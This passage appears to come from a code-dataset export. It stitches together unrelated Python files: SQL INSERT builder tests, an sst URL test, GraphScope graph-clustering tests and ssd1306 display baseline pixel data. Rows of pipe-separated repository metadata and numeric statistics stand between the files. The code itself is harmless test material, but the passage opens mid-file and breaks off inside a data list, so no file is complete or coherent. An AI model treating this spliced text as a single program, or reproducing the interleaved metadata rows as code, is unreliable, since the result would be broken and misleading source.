    """INSERT with an explicit column list and a single value tuple."""
    statement = engine.insert(
        'person', columns=('person_id', 'name'), values=('mosky', 'Mosky Liu'),
    )
    expected = Sql(
        '''INSERT INTO "person" ("person_id", "name") '''
        '''VALUES ('mosky', 'Mosky Liu')'''
    )
    assert statement == expected
def test_insert_values(engine):
    """The column list may be omitted when inserting a full row."""
    statement = engine.insert('person', values=('mosky', 'Mosky Liu'))
    assert statement == Sql(
        '''INSERT INTO "person" VALUES ('mosky', 'Mosky Liu')'''
    )
def test_insert_values_multiple(engine):
    """Multiple value tuples render as a comma-separated VALUES list."""
    rows = [
        ('mosky', 'Mosky Liu'),
        ('yiyu', 'Yi-Yu Liu'),
    ]
    statement = engine.insert('person', values=rows)
    expected = Sql(
        'INSERT INTO "person" '
        "VALUES ('mosky', 'Mosky Liu'), ('yiyu', 'Yi-Yu Liu')"
    )
    assert statement == expected
def test_insert_dict(engine):
    """A mapping supplies both columns and values; key order is unspecified."""
    statement = engine.insert(
        'person', values={'person_id': 'mosky', 'name': 'Mosky Liu'},
    )
    # Either column ordering is acceptable.
    acceptable = (
        Sql('''INSERT INTO "person" ("person_id", "name") '''
            '''VALUES ('mosky', 'Mosky Liu')'''),
        Sql('''INSERT INTO "person" ("name", "person_id") '''
            '''VALUES ('Mosky Liu', 'mosky')'''),
    )
    assert statement in acceptable
def test_insert_dict_multiple(engine):
    """Multiple mappings render as one multi-row INSERT; key order is free."""
    statement = engine.insert(
        'person', values=[
            {'person_id': 'mosky', 'name': 'Mosky Liu'},
            {'name': 'Yi-Yu Liu', 'person_id': 'yiyu'},
        ],
    )
    # Either column ordering is acceptable.
    acceptable = (
        Sql('''INSERT INTO "person" ("person_id", "name") '''
            '''VALUES ('mosky', 'Mosky Liu'), ('yiyu', 'Yi-Yu Liu')'''),
        Sql('''INSERT INTO "person" ("name", "person_id") '''
            '''VALUES ('Mosky Liu', 'mosky'), ('Yi-Yu Liu', 'yiyu')'''),
    )
    assert statement in acceptable
def test_insert_empty_values(engine):
    """An empty value tuple produces an empty VALUES clause."""
    statement = engine.insert('person', values=())
    assert statement == Sql('''INSERT INTO "person" VALUES ()''')
def test_insert_empty_values_multiple(engine):
    """Several empty tuples each render as an empty value group."""
    statement = engine.insert('person', values=[(), (), ()])
    assert statement == Sql("""INSERT INTO "person" VALUES (), (), ()""")
| 29.594203
| 79
| 0.533301
| 230
| 2,042
| 4.617391
| 0.121739
| 0.090395
| 0.110169
| 0.161017
| 0.870057
| 0.810734
| 0.810734
| 0.780603
| 0.746704
| 0.660075
| 0
| 0
| 0.250245
| 2,042
| 68
| 80
| 30.029412
| 0.693664
| 0.019099
| 0
| 0.3
| 0
| 0
| 0.327746
| 0
| 0
| 0
| 0
| 0
| 0.14
| 1
| 0.14
| false
| 0
| 0.02
| 0
| 0.16
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bcfce7b6435d5beb2620bc014aaed688c4bd0d5d
| 1,190
|
py
|
Python
|
src/sst/selftests/url.py
|
DramaFever/sst
|
63d41a102c9d3bdb54019f28a93cff0314a0214f
|
[
"Apache-2.0"
] | 4
|
2015-01-21T22:20:50.000Z
|
2017-12-18T11:38:16.000Z
|
src/sst/selftests/url.py
|
DramaFever/sst
|
63d41a102c9d3bdb54019f28a93cff0314a0214f
|
[
"Apache-2.0"
] | 63
|
2015-01-13T19:32:06.000Z
|
2020-04-22T17:01:03.000Z
|
src/sst/selftests/url.py
|
wbdl/sst
|
7a2805391fdd390ecb0f488f8377f58381358c89
|
[
"Apache-2.0"
] | null | null | null |
import sst
import sst.actions
# tests go_to, assert_url, assert_title, set_base_url
# reset_base_url, get_base_url

# Precompute the URL variants exercised below.
base_with_slash = 'http://localhost:%s/' % sst.DEVSERVER_PORT
base_no_slash = 'http://localhost:%s' % sst.DEVSERVER_PORT
base_no_scheme = 'localhost:%s' % sst.DEVSERVER_PORT

sst.actions.set_base_url(base_with_slash)
sst.actions.go_to('/')
sst.actions.assert_url('/')
sst.actions.fails(sst.actions.assert_url, '/foo')

# A base url without a scheme has 'http://' prepended.
sst.actions.set_base_url(base_no_scheme)
assert sst.actions.get_base_url() == base_no_slash

sst.actions.set_base_url(base_with_slash)
assert sst.actions.get_base_url() == base_with_slash
sst.actions.go_to('/')

# assert_url adds the base url for relative urls
# so test both ways
sst.actions.assert_url(base_with_slash)
sst.actions.assert_url('/')
sst.actions.fails(sst.actions.assert_url, '/begin/')

# assert_url works also without the trailing slash
sst.actions.assert_url(base_no_slash)

sst.actions.reset_base_url()
assert sst.actions.get_base_url() is None

sst.actions.set_base_url(base_with_slash)
sst.actions.go_to('/')
sst.actions.assert_url(base_with_slash)
| 32.162162
| 79
| 0.747899
| 188
| 1,190
| 4.489362
| 0.196809
| 0.248815
| 0.138626
| 0.234597
| 0.757109
| 0.733412
| 0.702607
| 0.702607
| 0.702607
| 0.702607
| 0
| 0
| 0.084034
| 1,190
| 36
| 80
| 33.055556
| 0.774312
| 0.163025
| 0
| 0.47619
| 0
| 0
| 0.187879
| 0
| 0
| 0
| 0
| 0
| 0.47619
| 1
| 0
| true
| 0
| 0.095238
| 0
| 0.095238
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
4c4b3b487239d8ea9369022055bd26d4109a6996
| 14,385
|
py
|
Python
|
python/graphscope/nx/algorithms/tests/builtin/test_cluster.py
|
lnfjpt/GraphScope
|
917146f86d8387302a2e1de6963115e7568bf3ee
|
[
"Apache-2.0"
] | 1
|
2021-12-30T02:55:16.000Z
|
2021-12-30T02:55:16.000Z
|
python/graphscope/nx/algorithms/tests/builtin/test_cluster.py
|
lnfjpt/GraphScope
|
917146f86d8387302a2e1de6963115e7568bf3ee
|
[
"Apache-2.0"
] | null | null | null |
python/graphscope/nx/algorithms/tests/builtin/test_cluster.py
|
lnfjpt/GraphScope
|
917146f86d8387302a2e1de6963115e7568bf3ee
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
#
# This file test_cluster.py is referred and derived from project NetworkX
#
# which has the following license:
#
# Copyright (C) 2004-2020, NetworkX Developers
# Aric Hagberg <hagberg@lanl.gov>
# Dan Schult <dschult@colgate.edu>
# Pieter Swart <swart@lanl.gov>
# All rights reserved.
#
# This file is part of NetworkX.
#
# NetworkX is distributed under a BSD license; see LICENSE.txt for more
# information.
#
import pytest
from graphscope import nx
@pytest.mark.usefixtures("graphscope_session")
class TestTriangles:
    """Per-node triangle counts via nx.builtin.triangles."""

    def test_empty(self):
        # No nodes means no triangle counts at all.
        assert list(nx.builtin.triangles(nx.Graph()).values()) == []

    def test_path(self):
        path = nx.path_graph(10)
        assert list(nx.builtin.triangles(path).values()) == [0] * 10
        assert nx.builtin.triangles(path) == {node: 0 for node in range(10)}

    def test_cubical(self):
        cube = nx.cubical_graph()
        assert list(nx.builtin.triangles(cube).values()) == [0] * 8
        assert nx.builtin.triangles(cube, 1) == 0
        assert list(nx.builtin.triangles(cube, [1, 2]).values()) == [0, 0]
        assert nx.builtin.triangles(cube, 1) == 0
        assert nx.builtin.triangles(cube, [1, 2]) == {1: 0, 2: 0}

    def test_k5(self):
        k5 = nx.complete_graph(5)
        assert list(nx.builtin.triangles(k5).values()) == [6] * 5
        assert sum(nx.builtin.triangles(k5).values()) / 3.0 == 10
        assert nx.builtin.triangles(k5, 1) == 6
        # Dropping one edge removes it from every triangle it was part of.
        k5.remove_edge(1, 2)
        counts = dict(sorted(nx.builtin.triangles(k5).items()))
        assert list(counts.values()) == [5, 3, 3, 5, 5]
        assert nx.builtin.triangles(k5, 1) == 3
@pytest.mark.usefixtures("graphscope_session")
class TestDirectedClustering:
def test_clustering(self):
G = nx.DiGraph()
assert list(nx.builtin.clustering(G).values()) == []
assert nx.builtin.clustering(G) == {}
def test_path(self):
G = nx.path_graph(10, create_using=nx.DiGraph())
assert list(nx.builtin.clustering(G).values()) == [
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
]
assert nx.builtin.clustering(G) == {
0: 0.0,
1: 0.0,
2: 0.0,
3: 0.0,
4: 0.0,
5: 0.0,
6: 0.0,
7: 0.0,
8: 0.0,
9: 0.0,
}
def test_k5(self):
G = nx.complete_graph(5, create_using=nx.DiGraph())
assert list(nx.builtin.clustering(G).values()) == [1, 1, 1, 1, 1]
assert nx.builtin.average_clustering(G) == 1
G.remove_edge(1, 2)
assert list(dict(sorted(nx.builtin.clustering(G).items())).values()) == [
11.0 / 12.0,
1.0,
1.0,
11.0 / 12.0,
11.0 / 12.0,
]
assert nx.builtin.clustering(G, [1, 4]) == {1: 1.0, 4: 11.0 / 12.0}
G.remove_edge(2, 1)
assert list(dict(sorted(nx.builtin.clustering(G).items())).values()) == [
5.0 / 6.0,
1.0,
1.0,
5.0 / 6.0,
5.0 / 6.0,
]
assert nx.builtin.clustering(G, [1, 4]) == {1: 1.0, 4: 0.83333333333333337}
def test_triangle_and_edge(self):
G = nx.cycle_graph(3, create_using=nx.DiGraph())
G.add_edge(0, 4)
assert nx.builtin.clustering(G)[0] == 1.0 / 6.0
@pytest.mark.usefixtures("graphscope_session")
class TestDirectedWeightedClustering:
def test_clustering(self):
G = nx.DiGraph()
assert list(nx.builtin.clustering(G, weight="weight").values()) == []
assert nx.builtin.clustering(G) == {}
def test_path(self):
G = nx.path_graph(10, create_using=nx.DiGraph())
assert list(nx.builtin.clustering(G, weight="weight").values()) == [
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
]
assert nx.builtin.clustering(G, weight="weight") == {
0: 0.0,
1: 0.0,
2: 0.0,
3: 0.0,
4: 0.0,
5: 0.0,
6: 0.0,
7: 0.0,
8: 0.0,
9: 0.0,
}
def test_k5(self):
G = nx.complete_graph(5, create_using=nx.DiGraph())
assert list(nx.builtin.clustering(G, weight="weight").values()) == [
1,
1,
1,
1,
1,
]
assert nx.builtin.average_clustering(G, weight="weight") == 1
G.remove_edge(1, 2)
assert G.number_of_nodes() == 5
assert list(
dict(sorted(nx.builtin.clustering(G, weight="weight").items())).values()
) == [
11.0 / 12.0,
1.0,
1.0,
11.0 / 12.0,
11.0 / 12.0,
]
assert nx.builtin.clustering(G, [1, 4], weight="weight") == {
1: 1.0,
4: 11.0 / 12.0,
}
G.remove_edge(2, 1)
assert list(
dict(sorted(nx.builtin.clustering(G, weight="weight").items())).values()
) == [
5.0 / 6.0,
1.0,
1.0,
5.0 / 6.0,
5.0 / 6.0,
]
assert nx.builtin.clustering(G, [1, 4], weight="weight") == {
1: 1.0,
4: 0.83333333333333337,
}
def test_triangle_and_edge(self):
G = nx.cycle_graph(3, create_using=nx.DiGraph())
G.add_edge(0, 4, weight=2)
assert nx.builtin.clustering(G)[0] == 1.0 / 6.0
assert nx.builtin.clustering(G, weight="weight")[0] == 1.0 / 12.0
@pytest.mark.usefixtures("graphscope_session")
class TestWeightedClustering:
def test_clustering(self):
G = nx.Graph()
assert list(nx.builtin.clustering(G, weight="weight").values()) == []
assert nx.builtin.clustering(G) == {}
def test_path(self):
G = nx.path_graph(10)
assert list(nx.builtin.clustering(G, weight="weight").values()) == [
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
]
assert nx.builtin.clustering(G, weight="weight") == {
0: 0.0,
1: 0.0,
2: 0.0,
3: 0.0,
4: 0.0,
5: 0.0,
6: 0.0,
7: 0.0,
8: 0.0,
9: 0.0,
}
def test_cubical(self):
G = nx.cubical_graph()
assert list(nx.builtin.clustering(G, weight="weight").values()) == [
0,
0,
0,
0,
0,
0,
0,
0,
]
assert nx.builtin.clustering(G, 1) == 0
assert list(nx.builtin.clustering(G, [1, 2], weight="weight").values()) == [
0,
0,
]
assert nx.builtin.clustering(G, 1, weight="weight") == 0
assert nx.builtin.clustering(G, [1, 2], weight="weight") == {1: 0, 2: 0}
def test_k5(self):
G = nx.complete_graph(5)
assert list(nx.builtin.clustering(G, weight="weight").values()) == [
1,
1,
1,
1,
1,
]
assert nx.builtin.average_clustering(G, weight="weight") == 1
G.remove_edge(1, 2)
assert list(
dict(sorted(nx.builtin.clustering(G, weight="weight").items())).values()
) == [
5.0 / 6.0,
1.0,
1.0,
5.0 / 6.0,
5.0 / 6.0,
]
assert nx.builtin.clustering(G, [1, 4], weight="weight") == {
1: 1.0,
4: 0.83333333333333337,
}
def test_triangle_and_edge(self):
G = nx.cycle_graph(3)
G.add_edge(0, 4, weight=2)
assert nx.builtin.clustering(G)[0] == 1.0 / 3.0
assert nx.builtin.clustering(G, weight="weight")[0] == 1.0 / 6.0
@pytest.mark.usefixtures("graphscope_session")
class TestClustering:
    """Unweighted local clustering coefficients."""

    def test_clustering(self):
        empty = nx.Graph()
        assert list(nx.builtin.clustering(empty).values()) == []
        assert nx.builtin.clustering(empty) == {}

    def test_path(self):
        path = nx.path_graph(10)
        # A path has no triangles, so every coefficient is zero.
        assert list(nx.builtin.clustering(path).values()) == [0.0] * 10
        assert nx.builtin.clustering(path) == {node: 0.0 for node in range(10)}

    def test_cubical(self):
        cube = nx.cubical_graph()
        assert list(nx.builtin.clustering(cube).values()) == [0] * 8
        assert nx.builtin.clustering(cube, 1) == 0
        assert list(nx.builtin.clustering(cube, [1, 2]).values()) == [0, 0]
        assert nx.builtin.clustering(cube, 1) == 0
        assert nx.builtin.clustering(cube, [1, 2]) == {1: 0, 2: 0}

    def test_k5(self):
        k5 = nx.complete_graph(5)
        assert list(nx.builtin.clustering(k5).values()) == [1] * 5
        assert nx.builtin.average_clustering(k5) == 1
        k5.remove_edge(1, 2)
        coefficients = dict(sorted(nx.builtin.clustering(k5).items()))
        assert list(coefficients.values()) == [
            5.0 / 6.0,
            1.0,
            1.0,
            5.0 / 6.0,
            5.0 / 6.0,
        ]
        assert nx.builtin.clustering(k5, [1, 4]) == {1: 1.0, 4: 0.83333333333333337}
@pytest.mark.usefixtures("graphscope_session")
@pytest.mark.skip(reason="output not ready, wait to check.")
class TestTransitivity:
    """Transitivity (global clustering coefficient) on small graphs."""

    def test_transitivity(self):
        # An empty graph has no triads at all.
        assert nx.builtin.transitivity(nx.Graph()) == 0.0

    def test_path(self):
        assert nx.builtin.transitivity(nx.path_graph(10)) == 0.0

    def test_cubical(self):
        assert nx.builtin.transitivity(nx.cubical_graph()) == 0.0

    def test_k5(self):
        k5 = nx.complete_graph(5)
        assert nx.builtin.transitivity(k5) == 1.0
        k5.remove_edge(1, 2)
        assert nx.builtin.transitivity(k5) == 0.875
@pytest.mark.usefixtures("graphscope_session")
@pytest.mark.skip(reason="output not ready, wait to check.")
class TestSquareClustering:
def test_clustering(self):
G = nx.Graph()
assert list(nx.square_clustering(G).values()) == []
assert nx.square_clustering(G) == {}
def test_path(self):
G = nx.path_graph(10)
assert list(nx.square_clustering(G).values()) == [
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
]
assert nx.square_clustering(G) == {
0: 0.0,
1: 0.0,
2: 0.0,
3: 0.0,
4: 0.0,
5: 0.0,
6: 0.0,
7: 0.0,
8: 0.0,
9: 0.0,
}
def test_cubical(self):
G = nx.cubical_graph()
assert list(nx.square_clustering(G).values()) == [
0.5,
0.5,
0.5,
0.5,
0.5,
0.5,
0.5,
0.5,
]
assert list(nx.square_clustering(G, [1, 2]).values()) == [0.5, 0.5]
assert nx.square_clustering(G, [1])[1] == 0.5
assert nx.square_clustering(G, [1, 2]) == {1: 0.5, 2: 0.5}
def test_k5(self):
G = nx.complete_graph(5)
assert list(nx.square_clustering(G).values()) == [1, 1, 1, 1, 1]
def test_bipartite_k5(self):
G = nx.complete_bipartite_graph(5, 5)
assert list(nx.square_clustering(G).values()) == [1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
def test_lind_square_clustering(self):
"""Test C4 for figure 1 Lind et al (2005)"""
G = nx.Graph(
[
(1, 2),
(1, 3),
(1, 6),
(1, 7),
(2, 4),
(2, 5),
(3, 4),
(3, 5),
(6, 7),
(7, 8),
(6, 8),
(7, 9),
(7, 10),
(6, 11),
(6, 12),
(2, 13),
(2, 14),
(3, 15),
(3, 16),
]
)
G1 = G.subgraph([1, 2, 3, 4, 5, 13, 14, 15, 16])
G2 = G.subgraph([1, 6, 7, 8, 9, 10, 11, 12])
assert nx.square_clustering(G, [1])[1] == 3 / 75.0
assert nx.square_clustering(G1, [1])[1] == 2 / 6.0
assert nx.square_clustering(G2, [1])[1] == 1 / 5.0
@pytest.mark.usefixtures("graphscope_session")
def test_average_clustering():
    """Average clustering of a triangle with one pendant edge attached."""
    graph = nx.cycle_graph(3)
    graph.add_edge(2, 3)
    # Three clustered nodes (1, 1, 1/3) plus one pendant node at zero.
    expected_with_zeros = (1 + 1 + 1 / 3.0) / 4.0
    expected_without_zeros = (1 + 1 + 1 / 3.0) / 3.0
    tolerance = dict(rel=1e-9, abs=1e-12)
    assert nx.builtin.average_clustering(graph) == pytest.approx(
        expected_with_zeros, **tolerance
    )
    assert nx.builtin.average_clustering(graph, count_zeros=True) == pytest.approx(
        expected_with_zeros, **tolerance
    )
    assert nx.builtin.average_clustering(graph, count_zeros=False) == pytest.approx(
        expected_without_zeros, **tolerance
    )
@pytest.mark.usefixtures("graphscope_session")
@pytest.mark.skip(reason="output not ready, wait to check.")
class TestGeneralizedDegree:
    """Generalized degree: histogram of triangle counts over incident edges."""

    def test_generalized_degree(self):
        assert nx.generalized_degree(nx.Graph()) == {}

    def test_path(self):
        path = nx.path_graph(5)
        # No triangles on a path: every incident edge sits in zero triangles.
        assert nx.generalized_degree(path, 0) == {0: 1}
        assert nx.generalized_degree(path, 1) == {0: 2}

    def test_cubical(self):
        assert nx.generalized_degree(nx.cubical_graph(), 0) == {0: 3}

    def test_k5(self):
        k5 = nx.complete_graph(5)
        assert nx.generalized_degree(k5, 0) == {3: 4}
        k5.remove_edge(0, 1)
        assert nx.generalized_degree(k5, 0) == {2: 3}
| 28.428854
| 87
| 0.467709
| 1,939
| 14,385
| 3.400722
| 0.076328
| 0.057325
| 0.05505
| 0.064907
| 0.861692
| 0.840764
| 0.792539
| 0.751744
| 0.706855
| 0.690931
| 0
| 0.102781
| 0.375043
| 14,385
| 505
| 88
| 28.485149
| 0.630701
| 0.030518
| 0
| 0.702273
| 0
| 0
| 0.028009
| 0
| 0
| 0
| 0
| 0
| 0.209091
| 1
| 0.081818
| false
| 0
| 0.004545
| 0
| 0.104545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4c6c6126959fd9ff5179773780e63e5f541bf0a7
| 49,972
|
py
|
Python
|
tests/baseline_data.py
|
4gbag/ssd1306
|
f856c224f07cac74b618f2e6aeb7ebe23bc199ba
|
[
"MIT"
] | 1
|
2020-03-21T07:41:50.000Z
|
2020-03-21T07:41:50.000Z
|
tests/baseline_data.py
|
4gbag/ssd1306
|
f856c224f07cac74b618f2e6aeb7ebe23bc199ba
|
[
"MIT"
] | null | null | null |
tests/baseline_data.py
|
4gbag/ssd1306
|
f856c224f07cac74b618f2e6aeb7ebe23bc199ba
|
[
"MIT"
] | 2
|
2020-03-24T07:33:37.000Z
|
2020-03-24T07:35:01.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
def primitives(device, draw):
padding = 2
shape_width = 20
top = padding
bottom = device.height - padding - 1
draw.rectangle(device.bounding_box, outline="white", fill="black")
x = padding
draw.ellipse((x, top, x + shape_width, bottom), outline="red", fill="black")
x += shape_width + padding
draw.rectangle((x, top, x + shape_width, bottom), outline="blue", fill="black")
x += shape_width + padding
draw.polygon([(x, bottom), (x + shape_width / 2, top), (x + shape_width, bottom)], outline="green", fill="black")
x += shape_width + padding
draw.line((x, bottom, x + shape_width, top), fill="yellow")
draw.line((x, top, x + shape_width, bottom), fill="yellow")
x += shape_width + padding
draw.text((x, top), 'Hello', fill="cyan")
draw.text((x, top + 20), 'World!', fill="purple")
# These datasets are purely to prevent regression bugs from creeping in
demo_ssd1306 = [
255, 1, 1, 1, 1, 1, 1, 1, 1, 129, 193, 65, 193, 129, 1, 1, 241, 241, 17,
17, 1, 1, 241, 241, 17, 17, 1, 129, 193, 65, 193, 129, 33, 225, 225, 129,
225, 225, 1, 13, 113, 129, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
129, 113, 13, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 225, 29, 225, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 253, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5,
253, 1, 1, 1, 1, 1, 129, 97, 25, 9, 5, 5, 5, 5, 5, 9, 25, 97, 129, 1, 1, 1,
1, 1, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 3, 7, 4, 7, 3, 4, 4, 7, 7, 4, 4, 4,
4, 7, 7, 4, 4, 0, 5, 5, 5, 7, 3, 4, 7, 7, 0, 7, 7, 0, 0, 0, 3, 28, 224, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 224, 28, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
248, 7, 0, 7, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 240, 14, 1, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 1, 14, 240, 0, 0, 0, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 56, 192, 0, 0, 0, 0, 0, 192, 56, 7, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 128, 126, 1, 0, 0, 0, 1, 126, 128, 0, 0, 0, 0,
0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
0, 192, 63, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 63, 192, 0,
255, 255, 0, 0, 0, 0, 94, 94, 0, 64, 127, 127, 69, 124, 56, 64, 64, 127,
127, 65, 65, 12, 4, 76, 120, 124, 68, 0, 56, 124, 68, 124, 56, 2, 30, 112,
62, 112, 30, 0, 0, 0, 0, 0, 0, 0, 0, 1, 14, 112, 128, 112, 14, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 224, 31, 0, 0, 0, 0, 0, 0, 0, 31, 224, 0, 0,
0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
0, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
128, 112, 14, 1, 14, 112, 128, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 7,
0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 248, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 0, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 224, 28, 3, 0, 0, 0, 0, 0, 3, 28, 224, 0, 0, 0,
0, 0, 0, 0, 0, 128, 126, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 126, 128,
0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
0, 1, 126, 128, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128, 126, 1,
0, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 192, 56, 7, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 56, 192, 0, 0, 0, 0, 224, 31, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 224, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 7, 56, 192, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 192, 56, 7, 0, 0, 0, 255, 255, 128, 128, 128, 128, 128,
128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128,
128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128,
128, 128, 128, 176, 142, 129, 128, 128, 128, 128, 128, 128, 128, 128, 128,
128, 128, 128, 128, 128, 128, 129, 142, 176, 128, 184, 167, 160, 160, 160,
160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 167,
184, 128, 191, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160,
160, 160, 160, 160, 160, 160, 160, 191, 128, 128, 128, 128, 128, 128, 131,
140, 136, 144, 144, 176, 144, 144, 136, 140, 131, 128, 128, 128, 128, 128,
128, 255
]
demo_sh1106 = [
{'command': [176, 2, 16]}, {'data': [255, 1, 1, 1, 1, 1, 129, 97, 25, 9, 5, 5, 5, 5, 5, 9, 25, 97, 129, 1, 1, 1, 1, 1, 253, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 253, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 225, 29, 225, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 13, 113, 129, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 129, 113, 13, 1, 225, 225, 129, 225, 225, 33, 129, 193, 65, 193, 129, 1, 17, 17, 241, 241, 1, 1, 17, 17, 241, 241, 1, 1, 129, 193, 65, 193, 129, 1, 1, 1, 1, 1, 1, 1, 1, 255]},
{'command': [177, 2, 16]}, {'data': [255, 0, 0, 0, 240, 14, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 14, 240, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 7, 0, 7, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 28, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 224, 28, 3, 0, 0, 0, 7, 7, 0, 7, 7, 4, 3, 7, 5, 5, 5, 0, 4, 4, 7, 7, 4, 4, 4, 4, 7, 7, 4, 4, 3, 7, 4, 7, 3, 0, 0, 0, 0, 0, 0, 0, 0, 255]},
{'command': [178, 2, 16]}, {'data': [255, 0, 192, 63, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 63, 192, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 128, 126, 1, 0, 0, 0, 1, 126, 128, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 56, 192, 0, 0, 0, 0, 0, 192, 56, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255]},
